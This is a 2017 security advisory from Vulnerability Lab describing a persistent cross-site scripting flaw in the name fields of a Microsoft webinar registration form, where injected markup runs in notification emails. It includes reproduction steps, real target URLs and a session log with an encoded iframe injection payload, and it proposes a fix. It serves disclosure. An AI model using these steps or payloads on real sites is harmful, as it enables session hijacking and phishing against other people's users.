Document Title: =============== Microsoft Info - Filter Bypass & Persistent Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2023 MSRC ID: TRK:0901002416 Release Date: ============= 2017-09-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2023 Common Vulnerability Scoring System: ==================================== 3.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Microsoft Corporation (commonly referred to as Microsoft or MS) is an American multinational technology company headquartered in Redmond, Washington, that develops, manufactures, licenses, supports and sells computer software, consumer electronics and personal computers and services. Its best known software products are the Microsoft Windows line of operating systems, Microsoft Office office suite, and Internet Explorer and Edge web browsers. Its flagship hardware products are the Xbox video game consoles and the Microsoft Surface tablet lineup. As of 2011, it was the world's largest software maker by revenue, and one of the world's most valuable companies. (Copy of the Vendor Homepage: https://en.wikipedia.org/wiki/Microsoft ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the microsoft info online service web-application. Vulnerability Disclosure Timeline: ================================== 2017-09-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Microsoft Corporation Product: Info - Cloud Online Service (Web-Application) 2016 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Low Technical Details & Description: ================================ A persistent input validation and mail encode web vulnerability has been discovered in the microsoft info online service web-application. The vulnerability allows remote attackers to inject own malicious script codes to the application-side to compromise the vulnerable module or function. The security vulnerability is located in the `firstname` and `lastname` input fields of the info microsoft webinar events formular. The basic validation procedure of the web formular is not secure parsed, thus allows remote attackers to inject malicious script codes to the firstname and lastname input fields of the registration formular. After the registration the wrong encode payload executes within the email notify of the info@microsoft.com online service web-application. The injection point are the input formular of the azure application. The execution point occurs in the outgoing email notify of the microsoft for sharepoint, azure, office and co. The attack vector of the issue is persistent and the request method to inject is POST. The vulnerability is a server-side issue that occurs because of a missing validation process. The issue could also have an effect to the webinar application front/backend. Attackers are able to register random emails to deliver malicious persistent manipulated email to any random targeted microsoft user. Due to the email is also available as html on the page by opening a browser link, the issue can be exploited with domain conditions on the microsoft info domain. The security risk of the persistent validation vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation web vulnerability requires no privilege web-application user account and only low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources and persistent manipulation of affected or connected service module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Registration Vulnerable File(s): [+] Registration.html Vulnerable Parameter(s): [+] Firstname [+] Lastname Proof of Concept (PoC): ======================= The persistent input validation web vulnerability and mail encode issue can be exploited by remote attackers without privilege web-application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the registration formular website for the azure event (marketo form) 2. Include to the firstname and lastname your script code payload for the testings 3. Save the entry and process the POST method request to register 4. Move inside the email postbox and have a look to the arriving email 5. The serivce emails of the webinar registration delivered over the info@microsoft.com service to your inbox execute the code directly 6. Now the attacker can as well open the link that requests the same content via html on the original microsoft website 7. Successful reproduce of the persistent input validation and mail encode issue! PoC: Exploitation microsoft azure -mail encode vulnerability registration events https://info.microsoft.com/DE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_Registration.html?wt.mc_id=AID533899_QSG_PD_SCL_27910 https://info.microsoft.com/DE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_ThankYouPage.html?aliId=237772136 https://info.microsoft.com/index.php/email/emailWebview?mkt_tok=eyJpIjoiWlRoak5tUTBOR0ZtTkRNMiIsInQiOiJVQzBTck5yZEhJN0xyR3ZHbDlRSWN2WTlsR1M4YVdrT0lreVJVMDBGZWwzd1AyRFNWT2VHamV0N2ZuYVdVOGhKOHIyZXJjTUxTTGNrb3dLT1lFNmRBb2tMbGF3K2dBaHFZTkRLQ3AvRlZTNUx0Q1JwSHlaRDdhbzhBaGx3Z3JRViJ9 http://emails.microsoft.com/ol/j0hYeMLJIlxQsRp74v-LLbrimSHEf5Wptbh-DPny190c3Fx_cfncLAy-2YUESsF_KKTMVVRIQcYs0B5XHq3YMdIYr6cLXwe_Szz2hPyKKYlHdekjmtJvovjj3WkB99yGn1XCKUoYT315cA-SZ_IzgT6pM58uGRaO_iaUYdJzzHhf0fsBzoa5fO7yvTU,/jE9TeMTLI1lNoVdlsbPWK6frkHvNc5u6tK9yD-Oo0cAzlkFwdunXdlHnmJxUEZM7aaabDAMZH6dkwhpRH_fKcYtUxeFSABy3QRHvqavVZrlCQ5p26s11y6Wx900Jj8e1pnbnC2wnU1hiVQ-yYJYyhW3rGpMEaQiq8VbbG7B3yBIFq7AB_reyUobgqVjw007o4D2kBgNHzu_J3w25ArNTofMNqXIq-EEcLbWkzRHi0IspmzQ_-LV8uCtnz_5-LN1qxxDYWxPzzqSqX_hAZ5-gp9TipNIOPi0FktwIVj77PmmWHNqrYy573B-5ww80Ax1dEBpjMOIApCGIl1N0Je8XcgeGyy0p6jsP7Zpv366hmQGnQm_ZNBrspDWZ4QuqG7IBkk6lrYwW9SvwaDPA3PtEYmClWsHTiReAdbqU PoC: Vulnerable Source

Congratulations, ">%20>"!

Below is your link to the on-demand webcast, Collaboration made easy with Office 365.

We hope you enjoy the program.

--- PoC Session Logs --- 15:20:38.166[1197ms][total 1197ms] Status: 200[OK] POST https://info.microsoft.com/index.php/leadCapture/save2 Mime Type[application/json] Request Header: Host[info.microsoft.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[https://info.microsoft.com/DE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_Registration.html?wt.mc_id=AID533899_QSG_PD_SCL_27910] Content-Length[1030] Cookie[BIGipServersj12web-app_https=!hiDX5IfDRfHVU6NEgmpKKdFIW06sxHwRGWg3amteDR8C91bRXfaqNMy/M9hYussHBaMfkvCoZoTZ5OY=; _mkto_trk=id:157-GQE-382&token:_mch-microsoft.com-1481811380016-93753; MSFPC=ID=40d3518f02fd704ea9d79408d50b8c41&CS=1&LV=201612&V=1; MC0=1481811381191; MC1=GUID=c3b50bf131afa74e9f5af95b410845a9&HASH=f10b&LV=201612&V=4&LU=1481811381899; MS0=3b96381d0f544801aff014d21b28e359; A=I&I=AxUFAAAAAABEBwAA/wMJi8pHKE5zoCi/rN2UrA!!&V=4] Connection[keep-alive] POST-Daten: FirstName[%22%3E%3Ciframe%3E%2520%3E%22%3Ciframe%20src%3Da%3E] LastName[%22%3E%3Ciframe%3E%2520%3E%22%3Ciframe%20src%3Da%3E] Email[admin%40evolution-sec.com] Phone[032567278562938519] Company[%22%3E%3Ciframe%3E%2520%3E%22%3Ciframe%20src%3Da%3E] Title[IT%20or%20Technical%20Manager] Country[Germany] SystemContactPreferenceMirrorOptIn[Yes] SystemContactPreferenceMirrorOptOut[Yes] ce_language[German] LeadSource[Webinar] ce_leadsourcedetail[] wTmcid[] systemFormsLanguageLocaleProduct[DE-DE-Azure] formid[2337] lpId[101017] subId[13] munchkinId[157-GQE-382] lpurl[%2F%2Finfo.microsoft.com%2FDE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_Registration.html%3Fcr%3D%7Bcreative%7D%26kw%3D%7Bkeyword%7D] followupLpId[101019] cr[] kw[] q[] _mkt_trk[id%3A157-GQE-382%26token%3A_mch-microsoft.com-1481811380016-93753] formVid[2337] _mktoReferrer[https%3A%2F%2Finfo.microsoft.com%2FDE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_Registration.html%3Fwt.mc_id%3DAID533899_QSG_PD_SCL_27910] Response Header: Date[Thu, 15 Dec 2016 14:20:39 GMT] Server[Apache] Access-Control-Allow-Origin[*] x-content-type-options[nosniff] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[181] Connection[Keep-Alive] Content-Type[application/json; charset=utf-8] - 15:20:39.367[2050ms][total 2663ms] Status: 200[OK] GET https://info.microsoft.com/DE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_ThankYouPage.html?aliId=237772136 Mime Type[text/html] Request Header: Host[info.microsoft.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] Referer[https://info.microsoft.com/DE-Azure-WBNR-FY17-09Sep-09-Big-Data-ein-Allheilmittel-fuer-alle-Datenprobleme-247691_Registration.html?wt.mc_id=AID533899_QSG_PD_SCL_27910] Cookie[BIGipServersj12web-app_https=!hiDX5IfDRfHVU6NEgmpKKdFIW06sxHwRGWg3amteDR8C91bRXfaqNMy/M9hYussHBaMfkvCoZoTZ5OY=; _mkto_trk=id:157-GQE-382&token:_mch-microsoft.com-1481811380016-93753; MSFPC=ID=40d3518f02fd704ea9d79408d50b8c41&CS=1&LV=201612&V=1; MC0=1481811381191; MC1=GUID=c3b50bf131afa74e9f5af95b410845a9&HASH=f10b&LV=201612&V=4&LU=1481811381899; MS0=3b96381d0f544801aff014d21b28e359; A=I&I=AxUFAAAAAABEBwAA/wMJi8pHKE5zoCi/rN2UrA!!&V=4] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Date[Thu, 15 Dec 2016 14:20:40 GMT] Server[Apache] p3p[CP="CAO CURa ADMa DEVa TAIa OUR IND UNI COM NAV INT"] Vary[*,Accept-Encoding] x-content-type-options[nosniff] Content-Encoding[gzip] Content-Length[3321] Connection[Keep-Alive] Content-Type[text/html; charset=utf-8] Solution - Fix & Patch: ======================= Parse the input fields and disallow the usage of special chars. Encode the vulnerable firstname and lastname parameters within the html email body of the marketo service. Include the emails to the cloud office proxy that is in use as well for the original office365 service application as well. Exclude the marketo application because the parse of there api is not correctly processing or validating. We did discovered the same issue within the original microsoft cloud office services in 2012/2013. There is no reason to use the marketo form to process customer webinars, use the basic function of the office cloud and email to info. Security Risk: ============== The security risk of the persisten input validation and mail encode issue in the azure, email.microsoft and microsoft info service is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™